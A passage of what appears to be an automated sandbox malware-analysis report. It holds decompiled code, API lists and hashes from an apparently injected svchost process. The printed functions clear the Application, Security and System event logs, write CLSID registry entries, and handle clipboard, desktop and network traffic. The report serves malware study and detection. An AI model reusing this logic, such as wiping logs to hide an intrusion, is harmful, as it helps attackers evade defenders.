                                                            				RegSetValueExW(??, ??, ??, ??, ??, ??);
                                                            				RegCloseKey(??);
                                                            				return E0000022B22BAF55A7C0(0, _t44, _v24 ^ _t62 - 0x000002d0);
                                                            			}
























                                                            0x22baf53c0f0
                                                            0x22baf53c0fd
                                                            0x22baf53c104
                                                            0x22baf53c107
                                                            0x22baf53c112
                                                            0x22baf53c116
                                                            0x22baf53c12a
                                                            0x22baf53c12c
                                                            0x22baf53c135
                                                            0x22baf53c146
                                                            0x22baf53c157
                                                            0x22baf53c15f
                                                            0x22baf53c167
                                                            0x22baf53c16c
                                                            0x22baf53c179
                                                            0x22baf53c17e
                                                            0x22baf53c181
                                                            0x22baf53c186
                                                            0x22baf53c189
                                                            0x22baf53c18e
                                                            0x22baf53c196
                                                            0x22baf53c1a9
                                                            0x22baf53c1b0
                                                            0x22baf53c1b0
                                                            0x22baf53c1b4
                                                            0x22baf53c1bf
                                                            0x22baf53c1c2
                                                            0x22baf53c1c7
                                                            0x22baf53c1d2
                                                            0x22baf53c1f8

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseCreateValuewsprintf
                                                            • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 4211343355-1865207932
                                                            • Opcode ID: 3625807fb6c510a2baa1aa18e7310167b2fd1ac4eed9e788a5f098aa340f5fa0
                                                            • Instruction ID: b6b88723edeeeea098d93f3bc77a48524c9c4f61c9232c085e38d572b7920fac
                                                            • Opcode Fuzzy Hash: 3625807fb6c510a2baa1aa18e7310167b2fd1ac4eed9e788a5f098aa340f5fa0
                                                            • Instruction Fuzzy Hash: 07214133214B84A2EB219F54F49D3DEB7A1F788764F805215E6A943BA9DF79C109CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Window$LongObject$BitmapBitsCompatibleCreateDeleteSelectVisible
                                                            • String ID:
                                                            • API String ID: 358708372-0
                                                            • Opcode ID: 5313be252f9b7b0df6761ce223440e109078e93a4f508decd9cae49f029374e0
                                                            • Instruction ID: 8dc2e0441809bd964d8ce13fc66c36968182804f52f4ef969383a6e9702e1d12
                                                            • Opcode Fuzzy Hash: 5313be252f9b7b0df6761ce223440e109078e93a4f508decd9cae49f029374e0
                                                            • Instruction Fuzzy Hash: 9921293B301B44A3EE698B66E55C35973A0F789B95F040524DE4E07F59EF3AE465C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$FreeInitializeProcess$DescriptorFileSecurity$AccessAllocAllocateAllowedCreateDaclLengthMappingView
                                                            • String ID: ($_kasssperskdy
                                                            • API String ID: 2879929819-2461904655
                                                            • Opcode ID: a09182481e26ac669774c95539dac808cf2a20b18b52c631822ebdde99700a0c
                                                            • Instruction ID: 36f0da76d5c286b0f1bc43cfe7d857f63d9d96dc3594e641c0b463b8fafdac8a
                                                            • Opcode Fuzzy Hash: a09182481e26ac669774c95539dac808cf2a20b18b52c631822ebdde99700a0c
                                                            • Instruction Fuzzy Hash: FA219233205B8095EB618F94F58C78AB7B0FB843A4F445629AA9903B99DF3DC058CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Message$BufferDispatchEventObjectSingleTranslateWaitwave
                                                            • String ID:
                                                            • API String ID: 3294988761-0
                                                            • Opcode ID: b229231a95d4e4669231b89e5171f42b00590e29d1cdf037308d4e367971940c
                                                            • Instruction ID: 06a1a7319b5f58176d09a4da3682cbd0e4be38da41d8f2c8fe5bd0c312998ac1
                                                            • Opcode Fuzzy Hash: b229231a95d4e4669231b89e5171f42b00590e29d1cdf037308d4e367971940c
                                                            • Instruction Fuzzy Hash: BA11E733B10440A3FB719F75E86C7AA73A1FB98B68F400610DA1DC3599DF2AC685C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Time$File$System$CreateLocalSpecificwsprintf
                                                            • String ID: %04d-%02d-%02d %02d:%02d
                                                            • API String ID: 4290651727-1132360693
                                                            • Opcode ID: 2f775c0bd6f7a4fa5cd52691ffe0a95143ab3886e29badf1376ce20509019764
                                                            • Instruction ID: e71acd0fd6a46e209f71412ee204eaf61eb05b3e1507e8a295634ee0759702af
                                                            • Opcode Fuzzy Hash: 2f775c0bd6f7a4fa5cd52691ffe0a95143ab3886e29badf1376ce20509019764
                                                            • Instruction Fuzzy Hash: F6119773218B40A2EB618F91F44979FBBB1F788795F404012EA8906A69EF7EC148CF40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DesktopThread$Current$CloseInformationMessageObjectOpenPostUser
                                                            • String ID: Winlogon
                                                            • API String ID: 3882203166-744610081
                                                            • Opcode ID: 8533d69ea8b4b2f8455bd460f2e74664a681840af0649eb1cacb9ea3f36c704d
                                                            • Instruction ID: 7d36346a2def606d03cc1eeac4b24b1c232b929cded819c11af086a28c508c5c
                                                            • Opcode Fuzzy Hash: 8533d69ea8b4b2f8455bd460f2e74664a681840af0649eb1cacb9ea3f36c704d
                                                            • Instruction Fuzzy Hash: 9901FE33B1154462FF7A97A6B44D7A97392EB48BC5F441030DE2A07B87EF3AC4514700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
                                                            • String ID:
                                                            • API String ID: 1677084743-0
                                                            • Opcode ID: a114f2aed88e79640990e4e7ea3f045385930bbca154a15c8b0be12dd73718a6
                                                            • Instruction ID: 2b2c761cfe4474c43233c0d1481ed9fb46dc266eb1cbd0b63a5a4af904106e5b
                                                            • Opcode Fuzzy Hash: a114f2aed88e79640990e4e7ea3f045385930bbca154a15c8b0be12dd73718a6
                                                            • Instruction Fuzzy Hash: 1B017C67715744B2FE6A5B96B85C3A9B390BB49BC1F080429DD0A0B79ADF3DC4418300
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 21%
                                                            			E0000022B22BAF53C050(signed int __ecx, long long __rbx, long long __rsi, long long _a8, long long _a16) {
                                                            				signed int _v16;
                                                            				long long _v24;
                                                            				long long _v32;
                                                            				long long _v40;
                                                            				signed long long _t23;
                                                            				long long _t27;
                                                            				void* _t40;
                                                            
                                                            				_a8 = __rbx;
                                                            				_a16 = __rsi;
                                                            				_t23 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_v16 = _t23 ^ _t40 - 0x00000040;
                                                            				_v40 = "Application";
                                                            				_v32 = "Security";
                                                            				_t27 = "System";
                                                            				_v24 = _t27;
                                                            				OpenEventLogA(??, ??);
                                                            				if (_t27 == 0) goto 0xaf53c0c7;
                                                            				ClearEventLogW(??, ??);
                                                            				CloseEventLog(??);
                                                            				if (1 - 6 < 0) goto 0xaf53c0a0;
                                                            				return E0000022B22BAF55A7C0(__ecx ^ __ecx, _t27, _v16 ^ _t40 - 0x00000040);
                                                            			}










                                                            0x22baf53c050
                                                            0x22baf53c055
                                                            0x22baf53c05f
                                                            0x22baf53c069
                                                            0x22baf53c077
                                                            0x22baf53c088
                                                            0x22baf53c08d
                                                            0x22baf53c094
                                                            0x22baf53c0a5
                                                            0x22baf53c0b1
                                                            0x22baf53c0b8
                                                            0x22baf53c0c1
                                                            0x22baf53c0d0
                                                            0x22baf53c0ee

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Event$ClearCloseOpen
                                                            • String ID: Application$Security$System
                                                            • API String ID: 1391105993-2169399579
                                                            • Opcode ID: 9403e0604ec6e86b20054b468ac63cfb8f8682670110084c64f7fa389618f3b9
                                                            • Instruction ID: 074228c9e906ab5f6c0fd3a0d61554cca843117e7bf78dd85e6a775022118d03
                                                            • Opcode Fuzzy Hash: 9403e0604ec6e86b20054b468ac63cfb8f8682670110084c64f7fa389618f3b9
                                                            • Instruction Fuzzy Hash: 83014036215F80A1EA268B96F49C28EB7A0FB88BD4F444525DA8E03729EF3DC156C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpen$HandleSleepwsprintf$EventObjectQuerySingleThreadValueWait
                                                            • String ID: Dispatch
                                                            • API String ID: 1613615442-2137261068
                                                            • Opcode ID: 6639ad343f6cbc1426152edcdf78c5457f56ca112ab68a50bb0683eae7e315fd
                                                            • Instruction ID: f3bd40e77d9999172313ba8471a8385270fde3f72d19a60c0d7ea36152eac5a2
                                                            • Opcode Fuzzy Hash: 6639ad343f6cbc1426152edcdf78c5457f56ca112ab68a50bb0683eae7e315fd
                                                            • Instruction Fuzzy Hash: C2F04433A01948B1FE37A7F9A85D3F833D2AB88B22F044625D617476E7DF2A84458350
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$Event$EnumEventsNetworkResetSelectrecv
                                                            • String ID:
                                                            • API String ID: 2625475714-0
                                                            • Opcode ID: 56a977729707f79909f4e8639b33f023a4fb1f05d64ad9e7d2a8c705dd88d839
                                                            • Instruction ID: aa815af4267fad233a63054d136b51d731d4cebce009b622193eeae6000f9087
                                                            • Opcode Fuzzy Hash: 56a977729707f79909f4e8639b33f023a4fb1f05d64ad9e7d2a8c705dd88d839
                                                            • Instruction Fuzzy Hash: D2615873204644A6E7768FA5D41C39E77F0F788B98F160119DA898739ACF7AC885CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 17%
                                                            			E0000022B22BAF55A020(intOrPtr* __rcx, void* __rdx, long long __r8, intOrPtr* __r9, long long __r13, long long __r14, long long __r15) {
                                                            				long long _v48;
                                                            				long long _v56;
                                                            				long long _v64;
                                                            				signed int _v88;
                                                            				char _v92;
                                                            				char _v96;
                                                            				long long _v104;
                                                            				long long _v120;
                                                            				void* _v128;
                                                            				long long _v136;
                                                            				void* __rbx;
                                                            				void* __rsi;
                                                            				void* __rbp;
                                                            				intOrPtr _t40;
                                                            				char _t41;
                                                            				intOrPtr _t42;
                                                            				signed long long _t75;
                                                            				long long _t100;
                                                            
                                                            				_t75 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_v88 = _t75 ^  &_v128;
                                                            				_v48 = __r13;
                                                            				_v56 = __r14;
                                                            				_v104 = __r8;
                                                            				r14d = 0;
                                                            				_v64 = __r15;
                                                            				if ( *((intOrPtr*)(__rdx + 0x5c)) != 0) goto 0xaf55a14d;
                                                            				if ( *__r9 - 1 > 0) goto 0xaf55a14d;
                                                            				_t40 =  *((intOrPtr*)( *__rcx + 0x198))();
                                                            				_t107 =  &_v96;
                                                            				 *((intOrPtr*)(__r8 + 0x30)) = _t40;
                                                            				_v120 = _t100;
                                                            				_v128 = _t100;
                                                            				r8d = 1;
                                                            				_v136 =  &_v92;
                                                            				_v92 = 0;
                                                            				_v96 = 0;
                                                            				__imp__WSARecv();
                                                            				if (_t40 != 0xffffffff) goto 0xaf55a0d0;
                                                            				__imp__#111();
                                                            				goto 0xaf55a0e2;
                                                            				_t41 = _v96;
                                                            				if (_t41 == 0) goto 0xaf55a0dd;
                                                            				 *((intOrPtr*)(__r8 + 0x30)) = _t41;
                                                            				goto 0xaf55a0e6;
                                                            				if (0x2775 != 0) goto 0xaf55a14d;
                                                            				if ( *((intOrPtr*)(__rdx + 0x40)) == 0) goto 0xaf55a137;
                                                            				EnterCriticalSection(??);
                                                            				if ( *((intOrPtr*)(__rdx + 0x40)) == 0) goto 0xaf55a128;
                                                            				SetLastError(??);
                                                            				r9d =  *((intOrPtr*)(__r8 + 0x30));
                                                            				_t42 =  *((intOrPtr*)( *__rcx + 0x1d0))();
                                                            				LeaveCriticalSection(??);
                                                            				r14d = r14d + 1;
                                                            				 *__r9 = _t42;
                                                            				if (r14d - 0x1e < 0) goto 0xaf55a064;
                                                            				if ( *__r9 - 1 > 0) goto 0xaf55a1d3;
                                                            				if (0x2775 == 0) goto 0xaf55a1d7;
                                                            				if (0x2775 == 0x2733) goto 0xaf55a1d7;
                                                            				if (0x2775 != 0x2775) goto 0xaf55a184;
                                                            				r9d = 0;
                                                            				_v136 = 0;
                                                            				_t33 = _t107 + 1; // 0x1
                                                            				r8d = _t33;
                                                            				goto 0xaf55a1a2;
                                                            				if (0x2775 == 0x2736) goto 0xaf55a1ad;
                                                            				if (0x2775 == 0x3e3) goto 0xaf55a1ad;
                                                            				r9d = 4;
                                                            				_v136 = 0x2775;
                                                            				r8d =  &_v96 - 2;
                                                            				E0000022B22BAF556B50( *__rcx, _v104, __rcx, __rdx, __rdx, _t100);
                                                            				if (E0000022B22BAF54FD40(_v104, __rcx + 0x100, _v104) != 0) goto 0xaf55a1d3;
                                                            				HeapFree(??, ??, ??);
                                                            				goto 0xaf55a1dc;
                                                            				return E0000022B22BAF55A7C0(0,  *__rcx, _v88 ^  &_v128);
                                                            			}





















                                                            0x22baf55a02e
                                                            0x22baf55a038
                                                            0x22baf55a03d
                                                            0x22baf55a044
                                                            0x22baf55a04c
                                                            0x22baf55a053
                                                            0x22baf55a056
                                                            0x22baf55a069
                                                            0x22baf55a074
                                                            0x22baf55a081
                                                            0x22baf55a08b
                                                            0x22baf55a090
                                                            0x22baf55a09c
                                                            0x22baf55a0a1
                                                            0x22baf55a0a6
                                                            0x22baf55a0ac
                                                            0x22baf55a0b3
                                                            0x22baf55a0b7
                                                            0x22baf55a0bb
                                                            0x22baf55a0c4
                                                            0x22baf55a0c6
                                                            0x22baf55a0ce
                                                            0x22baf55a0d0
                                                            0x22baf55a0d6
                                                            0x22baf55a0d8
                                                            0x22baf55a0db
                                                            0x22baf55a0e4
                                                            0x22baf55a0ef
                                                            0x22baf55a0f5
                                                            0x22baf55a0ff
                                                            0x22baf55a103
                                                            0x22baf55a118
                                                            0x22baf55a120
                                                            0x22baf55a12c
                                                            0x22baf55a137
                                                            0x22baf55a13a
                                                            0x22baf55a147
                                                            0x22baf55a161
                                                            0x22baf55a165
                                                            0x22baf55a16d
                                                            0x22baf55a175
                                                            0x22baf55a177
                                                            0x22baf55a17a
                                                            0x22baf55a17e
                                                            0x22baf55a17e
                                                            0x22baf55a182
                                                            0x22baf55a18a
                                                            0x22baf55a192
                                                            0x22baf55a194
                                                            0x22baf55a19a
                                                            0x22baf55a19e
                                                            0x22baf55a1a8
                                                            0x22baf55a1bf
                                                            0x22baf55a1cd
                                                            0x22baf55a1d5
                                                            0x22baf55a1f6

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$EnterFreeHeapLeaveRecv
                                                            • String ID:
                                                            • API String ID: 4219686125-0
                                                            • Opcode ID: 12dd66c93670e1939a1ad88641e15ffc3114c39ae3952dc450a49e628984dc07
                                                            • Instruction ID: e14b7952b31c41cd20f67aa5b606afd5672272331784d36ba949b8b716397cf2
                                                            • Opcode Fuzzy Hash: 12dd66c93670e1939a1ad88641e15ffc3114c39ae3952dc450a49e628984dc07
                                                            • Instruction Fuzzy Hash: BA517033204A84A7EB718FA6E44C79E77A4F784B84F544126DF8A43BA6DF3AC445CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 54%
                                                            			E0000022B22BAF552600(long long __rbx, intOrPtr* __rcx, long long __rbp, void* __r8, long long _a16, long long _a24) {
                                                            				void* _v24;
                                                            				signed int _v40;
                                                            				long long _v48;
                                                            				long long _v56;
                                                            				long long _v64;
                                                            				long long _v72;
                                                            				intOrPtr _v88;
                                                            				void* __rdi;
                                                            				void* __rsi;
                                                            				long _t36;
                                                            				void* _t38;
                                                            				intOrPtr _t40;
                                                            				void* _t41;
                                                            				void* _t42;
                                                            				intOrPtr _t45;
                                                            				void* _t53;
                                                            				intOrPtr _t59;
                                                            				void* _t60;
                                                            				signed long long _t74;
                                                            				intOrPtr* _t86;
                                                            				void* _t103;
                                                            				long long _t108;
                                                            				void* _t111;
                                                            				void* _t114;
                                                            				long long _t116;
                                                            
                                                            				_t114 = __r8;
                                                            				_a16 = __rbx;
                                                            				_a24 = __rbp;
                                                            				_t74 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_v40 = _t74 ^ _t111 - 0x00000060;
                                                            				_t86 = __rcx;
                                                            				GetCurrentThreadId();
                                                            				_t106 =  *__rcx;
                                                            				_t36 = GetCurrentThreadId();
                                                            				 *((intOrPtr*)( *__rcx + 0x180))();
                                                            				r14d = 0;
                                                            				_t59 =  *((intOrPtr*)(__rcx + 0x40));
                                                            				_v72 =  *((intOrPtr*)(__rcx + 0x30));
                                                            				_v64 =  *((intOrPtr*)(__rcx + 0x1e0));
                                                            				_v56 =  *((intOrPtr*)(__rcx + 0x1e8));
                                                            				_v48 =  *((intOrPtr*)(__rcx + 0x1f0));
                                                            				if ( *((intOrPtr*)(__rcx + 0x80)) == 0) goto 0xaf55269c;
                                                            				_t38 = E0000022B22BAF564114(_t53, _t36, _t60, __rcx, _t103, _t108, __r8);
                                                            				 *((long long*)(_t86 + 0x80)) = _t116;
                                                            				 *((long long*)(_t86 + 0x88)) = _t116;
                                                            				 *((long long*)(_t86 + 0x90)) = _t116;
                                                            				r9d = 0;
                                                            				E0000022B22BAF53CF40(_t38, _t86, _t86 + 0x80, __rbp, _t106);
                                                            				_t40 =  *((intOrPtr*)( *_t86 + 0x48))();
                                                            				if (_t40 == 0) goto 0xaf552746;
                                                            				r8d = 0;
                                                            				_v88 = r14d;
                                                            				r9d = r9d | 0xffffffff;
                                                            				_t22 = _t114 + 4; // 0x4
                                                            				__imp__WSAWaitForMultipleEvents();
                                                            				if (_t40 != 0) goto 0xaf5526e9;
                                                            				_t41 = E0000022B22BAF5527B0(_t40, _t86, _t86, _t106, _t108);
                                                            				goto 0xaf552719;
                                                            				if (_t41 != 1) goto 0xaf5526f7;
                                                            				_t42 = E0000022B22BAF552AF0(_t59, _t41 - 1,  *_t86, _t86, _t86, _t108, __rbp);
                                                            				goto 0xaf552719;
                                                            				if (_t42 == 2) goto 0xaf552743;
                                                            				if (_t42 != 3) goto 0xaf55272c;
                                                            				if ( *((intOrPtr*)( *_t86 + 0x178))() == 0) goto 0xaf552746;
                                                            				if (E0000022B22BAF5529F0(_t86, _t86) == 0) goto 0xaf552746;
                                                            				_t45 =  *((intOrPtr*)( *_t86 + 0x48))();
                                                            				if (_t45 != 0) goto 0xaf5526c0;
                                                            				goto 0xaf552746;
                                                            				if (_t45 != 0xffffffff) goto 0xaf55279e;
                                                            				__imp__#111();
                                                            				 *((intOrPtr*)(_t86 + 0x20)) = _t45;
                                                            				 *((long long*)(_t86 + 0x18)) = _t108;
                                                            				 *((intOrPtr*)(_t86 + 0x24)) = 1;
                                                            				goto 0xaf552746;
                                                            				GetCurrentThreadId();
                                                            				 *((intOrPtr*)( *_t86 + 0x188))();
                                                            				if (r14d == 0) goto 0xaf552774;
                                                            				if ( *((intOrPtr*)( *_t86 + 0x48))() == 0) goto 0xaf552774;
                                                            				 *((intOrPtr*)( *_t86 + 8))();
                                                            				GetCurrentThreadId();
                                                            				return E0000022B22BAF55A7C0(_t22,  *_t86, _v40 ^ _t111 - 0x00000060);
                                                            			}




























                                                            0x22baf552600
                                                            0x22baf552600
                                                            0x22baf552605
                                                            0x22baf552612
                                                            0x22baf55261c
                                                            0x22baf552621
                                                            0x22baf552624
                                                            0x22baf55262a
                                                            0x22baf55262d
                                                            0x22baf552638
                                                            0x22baf552642
                                                            0x22baf552651
                                                            0x22baf552654
                                                            0x22baf552660
                                                            0x22baf55266c
                                                            0x22baf552678
                                                            0x22baf552680
                                                            0x22baf552682
                                                            0x22baf552687
                                                            0x22baf55268e
                                                            0x22baf552695
                                                            0x22baf55269c
                                                            0x22baf5526a9
                                                            0x22baf5526b4
                                                            0x22baf5526b9
                                                            0x22baf5526c0
                                                            0x22baf5526c3
                                                            0x22baf5526c8
                                                            0x22baf5526d1
                                                            0x22baf5526d5
                                                            0x22baf5526dd
                                                            0x22baf5526e2
                                                            0x22baf5526e7
                                                            0x22baf5526eb
                                                            0x22baf5526f0
                                                            0x22baf5526f5
                                                            0x22baf5526fa
                                                            0x22baf5526ff
                                                            0x22baf55270f
                                                            0x22baf55271b
                                                            0x22baf552723
                                                            0x22baf552728
                                                            0x22baf55272a
                                                            0x22baf55272f
                                                            0x22baf552731
                                                            0x22baf552737
                                                            0x22baf55273a
                                                            0x22baf55273e
                                                            0x22baf552741
                                                            0x22baf552749
                                                            0x22baf552754
                                                            0x22baf55275c
                                                            0x22baf552769
                                                            0x22baf552771
                                                            0x22baf552774
                                                            0x22baf55279d

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CurrentThread$ErrorEventsFreeHeapLastMultipleWait
                                                            • String ID:
                                                            • API String ID: 115528036-0
                                                            • Opcode ID: 487cbb8aafd0d929da6ac9cc7c94f904b619e2e8e60626a5206b4a75e5ecb2e9
                                                            • Instruction ID: 43f2410504e4d369d2bfe73fdd41209607d37f9792fe17709a13f2ec2af356f0
                                                            • Opcode Fuzzy Hash: 487cbb8aafd0d929da6ac9cc7c94f904b619e2e8e60626a5206b4a75e5ecb2e9
                                                            • Instruction Fuzzy Hash: 46414937210B45A2EB66DF66E85C39D33A0FB49F94F085121DE4A4776ADF39C4458700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID:
                                                            • API String ID: 1452528299-0
                                                            • Opcode ID: 44d350a4b5c83003775e4f9530c2ffe8236e3fd3d788d357e2c3f26dcfd20579
                                                            • Instruction ID: aff83d1bcd39c78f162f92924807a3c209e7e72cd53fbc92622c4209d178dbb6
                                                            • Opcode Fuzzy Hash: 44d350a4b5c83003775e4f9530c2ffe8236e3fd3d788d357e2c3f26dcfd20579
                                                            • Instruction Fuzzy Hash: 9B41EA33300A4096E77E8B96A45C3ED73A2F7C5B96F184421DF5647796DF3AC4818701
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 25%
                                                            			E0000022B22BAF557B40(void* __ecx, void* __rcx, void* __r8, void* __r9) {
                                                            				void* __rbx;
                                                            				void* __rsi;
                                                            				void* __rbp;
                                                            				void* _t18;
                                                            				signed long long _t24;
                                                            				void* _t26;
                                                            				signed long long _t41;
                                                            
                                                            				_t18 = __ecx;
                                                            				_t24 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *(_t41 + 0x38) = _t24 ^ _t41;
                                                            				 *((intOrPtr*)(_t41 + 0x30)) = 0;
                                                            				 *((intOrPtr*)(_t41 + 0x20)) = 4;
                                                            				r8d = 0x7010;
                                                            				__imp__#21();
                                                            				 *((intOrPtr*)(__r8 + 0x58)) = 1;
                                                            				EnterCriticalSection(??);
                                                            				if ( *((intOrPtr*)(__r8 + 0x40)) != 0) goto 0xaf557c05;
                                                            				LeaveCriticalSection(??);
                                                            				r9d = 0;
                                                            				 *((intOrPtr*)(_t41 + 0x20)) = 0;
                                                            				r8d = 0;
                                                            				E0000022B22BAF556B50(_t24 ^ _t41, _t26, __rcx, __r8, __r9, __r8);
                                                            				if (E0000022B22BAF54FD40(_t26, __rcx + 0x100, __r9) != 0) goto 0xaf557bee;
                                                            				HeapFree(??, ??, ??);
                                                            				return E0000022B22BAF55A7C0(_t18, _t24 ^ _t41,  *(_t41 + 0x38) ^ _t41);
                                                            			}










                                                            0x22baf557b40
                                                            0x22baf557b4a
                                                            0x22baf557b54
                                                            0x22baf557b5c
                                                            0x22baf557b67
                                                            0x22baf557b7c
                                                            0x22baf557b89
                                                            0x22baf557b93
                                                            0x22baf557b9a
                                                            0x22baf557ba4
                                                            0x22baf557baa
                                                            0x22baf557bb0
                                                            0x22baf557bb3
                                                            0x22baf557bbb
                                                            0x22baf557bc4
                                                            0x22baf557bda
                                                            0x22baf557be8
                                                            0x22baf557c04

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$Leave$EnterErrorFreeHeapLastTimesetsockopttime
                                                            • String ID:
                                                            • API String ID: 4191520005-0
                                                            • Opcode ID: 136da11a116154dad4e1ad4228e1e2410369dd209a320e9677a29e2ef1bf5a3f
                                                            • Instruction ID: fc03d2948ae37d44514a2619f645e8997f93eadf511c65b80b1718b23879f800
                                                            • Opcode Fuzzy Hash: 136da11a116154dad4e1ad4228e1e2410369dd209a320e9677a29e2ef1bf5a3f
                                                            • Instruction Fuzzy Hash: 2C218D73210688A6EB229F62E85C7ED3760F785BD8F404111EE4E47B9ADF3AC445C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$EnterLeave
                                                            • String ID:
                                                            • API String ID: 2124651672-0
                                                            • Opcode ID: e01c26ba576f1730eadfbeb57038e2ce9451543a762f4fec211c3246469b1ed6
                                                            • Instruction ID: 573eba21a9c4873c4c5ca5536262e9d3d22b723f1087629bf6ee93abe6331d17
                                                            • Opcode Fuzzy Hash: e01c26ba576f1730eadfbeb57038e2ce9451543a762f4fec211c3246469b1ed6
